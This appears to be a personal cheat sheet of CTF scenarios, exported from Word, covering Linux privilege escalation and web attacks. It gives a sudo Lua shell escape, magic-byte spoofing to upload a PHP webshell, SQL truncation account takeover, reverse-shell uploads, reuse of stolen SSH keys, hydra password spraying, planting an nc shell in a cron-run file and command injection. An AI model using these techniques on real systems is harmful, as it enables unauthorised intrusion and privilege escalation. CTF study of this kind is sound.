<html> <head> <meta http-equiv=Content-Type content="text/html; charset=windows-1252"> <meta name=Generator content="Microsoft Word 15 (filtered)"> <style> <!-- /* Font Definitions */ @font-face {font-family:Wingdings; panose-1:5 0 0 0 0 0 0 0 0 0;} @font-face {font-family:"Cambria Math"; panose-1:2 4 5 3 5 4 6 3 2 4;} @font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin-top:0cm; margin-right:0cm; margin-bottom:8.0pt; margin-left:0cm; line-height:107%; font-size:11.0pt; font-family:"Calibri",sans-serif;} p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph {margin-top:0cm; margin-right:0cm; margin-bottom:8.0pt; margin-left:36.0pt; line-height:107%; font-size:11.0pt; font-family:"Calibri",sans-serif;} p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst {margin-top:0cm; margin-right:0cm; margin-bottom:0cm; margin-left:36.0pt; line-height:107%; font-size:11.0pt; font-family:"Calibri",sans-serif;} p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle {margin-top:0cm; margin-right:0cm; margin-bottom:0cm; margin-left:36.0pt; line-height:107%; font-size:11.0pt; font-family:"Calibri",sans-serif;} p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast {margin-top:0cm; margin-right:0cm; margin-bottom:8.0pt; margin-left:36.0pt; line-height:107%; font-size:11.0pt; font-family:"Calibri",sans-serif;} .MsoPapDefault {margin-bottom:8.0pt; line-height:107%;} @page WordSection1 {size:595.3pt 841.9pt; margin:72.0pt 72.0pt 72.0pt 72.0pt;} div.WordSection1 {page:WordSection1;} /* List Definitions */ ol {margin-bottom:0cm;} ul {margin-bottom:0cm;} --> </style> </head> <body lang=EN-GB style='word-wrap:break-word'> <div class=WordSection1> <p class=MsoListParagraph><b><span style='font-size:24.0pt;line-height:107%'>Scenarios – taken from CTF challenges</span></b></p> ========================================================================================================================================================== <p><a href="winscen.html" style="display:block; background-color: blue; width=100px ; padding: 20px; font-size: 30px; color:white; text-decoration:none;"> Windows Priv Esc Scenarios </a></p> =========================================================================================================================================================== <p class=MsoNormal><b><span style='font-size:22.0pt;line-height:107%'> </span></b></p> <p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; background:olive'>#### Deleted file by admin</span></b></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>.bash_history - reveals a file which has now been deleted (sudo -u sysadmin /home/syadmin/luvit privesc.ua)</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo -l - reveals we can run root for certain software which execute lua code</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'> </span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo "require('os');" > priv.lua</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo "os.execute('/bin/bash');" >> priv.lua</span></p> <p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'> </span></p> <p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; background:lime'>#### uploading tool to server</span></b></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo mv pspy64 /var/www/html</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo service apache2 start</span></p> <p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'> </span></p> <p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; color:white;background:purple'>#### backgrounding a shell</span></b></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>you can create a shell code and use & to background during SSH. Prevents other users been blocked</span></p> <p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'> </span></p> <p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; color:white;background:navy'>#### Magic bytes</span></b></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>you attempt to upload a file abc.php.jpg</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- gets flagged up immediately</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>way around it: </span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>get the magic bytes from a .jpg image (xxd image.jpg | head)</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>add these to start of our abc.php.jpg</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo 'FFD8FFDB' | xxd -r -p > webshell.php.jpg</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>then upload</span></p> <p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'> </span></p> <p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; background:aqua'>### SQL Truncation</span></b></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>-<b> </b>a website states a username or email cannot be more than xyz size</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>-from burp sending a username more than what is permitted</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so we enter loads of spaces around admin and then url encode</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- this works as according to MySQL documentation, trailing spaces are ingnored </span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so register account using admin@test.abc then catch request</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so now if we have an email of admin: admin@abc.abc add in many spaces after (admin@abc.abc++++++++++++++test)</span></p> <p class=MsoNormal><b><span style='font-size:22.0pt;line-height:107%'> </span></b></p> <p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%; color:white;background:teal'>#### Email changing to admin for priv</span></b></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>CTF where by the standard user could change password of the admin by catching in burpsuite and editing from user email to admin (which is found easily).</span></p> <p class=MsoListParagraph style='text-indent:-18.0pt'><span style='font-size: 14.0pt;line-height:107%;color:black'>-<span style='font:7.0pt "Times New Roman"'> </span></span><span style='font-size:14.0pt;line-height:107%;color:black'>Then when you go to profile of admin, source code view and you find</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>and images upload directory.</span></p> <p class=MsoListParagraph style='text-indent:-18.0pt'><span style='font-size: 14.0pt;line-height:107%;color:black'>-<span style='font:7.0pt "Times New Roman"'> </span></span><span style='font-size:14.0pt;line-height:107%;color:black'>So you go bk to profile, upload a reverse php shell (no indicator if uploaded or not)</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>then back to browser, type in /directory of image uploads followed by reverse shell</span></p> <p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>(ensure listener is on) – may need to use CURL</span></p> <p class=MsoListParagraphCxSpLast style='text-indent:-18.0pt'><span style='font-size:14.0pt;line-height:107%;color:black'>-<span style='font:7.0pt "Times New Roman"'> </span></span><span style='font-size:14.0pt;line-height:107%;color:black'>Then using the priv /sbin/reboot we reboot using that .sh file</span></p> <h1><b><span style='background:yellow'>###### Source code</span></b></h1> <p class=MsoNormal>even on directories found - lookat source code!! and run curl on them all</p> <p class=MsoNormal> </p> <p class=MsoNormal>website - directory fuzz only gave one link (sec config clue)</p> <p class=MsoNormal>use curl -L , look at source</p> <p class=MsoNormal> </p> <h1><b><span style='background:lime'>##### steghide extract issue</span></b></h1> <p class=MsoNormal>tried to extract using steghide extract -sf filename.jpg - would not work</p> <p class=MsoNormal>however when I write to another file it worked!</p> <p class=MsoNormal>steghide extract -sf filename.jpg -xf hash.txt</p> <p class=MsoNormal> </p> <p class=MsoNormal> </p> <h1><b><span style='background:silver'>##### Authorized keys</span></b></h1> <p class=MsoNormal>if you come across authorized keys from a userA but in the key file it shows UserB at the end</p> <p class=MsoNormal>you can log in as userA using private key of UserB</p> <p class=MsoNormal>we take the private key of userB and put onto our attacking machine, then we use that to log in as userA</p> <p class=MsoNormal>ssh userA@xx.xx.xx.xx -i .ssh/id_rsa_userB</p> <p class=MsoNormal>copy to system:</p> <p class=MsoNormal>scp USERB@192.168.124.230:~/.ssh/id_rsa . </p> <p class=MsoNormal> </p> <p class=MsoNormal> </p> <h1><b><span style='color:white;background:maroon'>##### Enum’d everything, so cannot find way in</span></b></h1> <p class=MsoNormal>do directory scan with extension set ie . -x .php</p> <p class=MsoNormal>(use dirsearch) - /web-content/big.txt -e .php</p> <p class=MsoNormal> </p> <h1><b><span style='color:white;background:navy'>##### Config file for lateral movement</span></b></h1> <p class=MsoNormal>when doing a box if you find a user and still need to do lateral movement</p> <p class=MsoNormal>go to /etc/phpmyadmin and look for the config file</p> <p class=MsoNormal> </p> <h1><b><span style='background:aqua'>##### DB/PHP passwords, user lists</span></b></h1> <p class=MsoNormal>if you find db passwords, php passwords - create a user list (from home) and run that single password with user list in hydra</p> <p class=MsoNormal> </p> <h1><b><span style='background:red'>#### Upload perm to smb share / cron job in management (box DAWN)</span></b></h1> <p class=MsoNormal>you have management.log - which shows a cron job</p> <p class=MsoNormal>eg: chmod 777 /home/dawn/ITDEPT/product-control </p> <p class=MsoNormal> </p> <p class=MsoNormal>you have upload access to smb share</p> <p class=MsoNormal>create a NC one liner reverse shell and insert into product-control and upload</p> <p class=MsoNormal> </p> <h1><b><span style='background:fuchsia'>#### Unshadowed</span></b></h1> <p class=MsoNormal>when we unshadowed pass shadow: the password is displayed, use this to crack further</p> <p class=MsoNormal> </p> <h1><b><span style='background:teal'>##### Restricted shell</span></b></h1> <p class=MsoNormal>type export in cmd</p> <p class=MsoNormal>is /bin writeable?</p> <p class=MsoNormal>ls -la /usr/bin (or /bin)</p> <p class=MsoNormal>look for writeable by all</p> <p class=MsoNormal> </p> <p class=MsoNormal><b><span style='font-size:18.0pt;line-height:107%'>method 2:</span></b></p> <p class=MsoNormal>ssh in using: -t "bash --noprofile"</p> <p class=MsoNormal>then need to use absolute paths - cat = /usr/bin/cat <file></p> <p class=MsoNormal> </p> <p class=MsoNormal><b><span style='font-size:18.0pt;line-height:107%'>method 3:</span></b></p> <p class=MsoNormal>export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"</p> <p class=MsoNormal> </p> <h1><b><span style='color:white;background:purple'>##### Making a file called update in /tmp executable</span></b></h1> <p class=MsoNormal>just echo a shell into it.</p> <p class=MsoNormal>may need to use full path for nc (if used)</p> <p class=MsoNormal> </p> <p class=MsoNormal>this is what enabled me to run chmod finally: </p> <p class=MsoNormal>export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"</p> <p class=MsoNormal> </p> <h1><b><span style='background:olive'>#### Command injection using |</span> </b></h1> <p class=MsoNormal>command injection found, cannot view /etc/passwd</p> <p class=MsoNormal>used burp suite</p> <p class=MsoNormal>BUT reverse shells would not work, </p> <p class=MsoNormal>command injection using | gives a cleaner output</p> <p class=MsoNormal>enter the reverse shell as found (no url encoding or anything) after the |</p> <p class=MsoNormal> </p> <p class=MsoNormal>- another thing is the website is on port 80 u need to get a reverse connection to port 80</p> <p class=MsoNormal> </p> <h1><b><span style='background:lime'>#### Rabbit hole!</span></b></h1> <p class=MsoNormal>easyboxfun</p> <p class=MsoNormal>kept concentrating on /gym instead of doing a scan on the main URL</p> <p class=MsoNormal> </p> <h1><b><span style='background:aqua'>##### Reverse shell escaping issues (wpwpn box)</span></b></h1> <p class=MsoNormal>we trying to run a reverse shell using command pre<system> ' ' </pre> the python reverse obviously contianed </p> <p class=MsoNormal>"" and '' so it double the amount of '' in use, using \ before the '' enabled the reverse shell to connect</p> </div> </body> </html>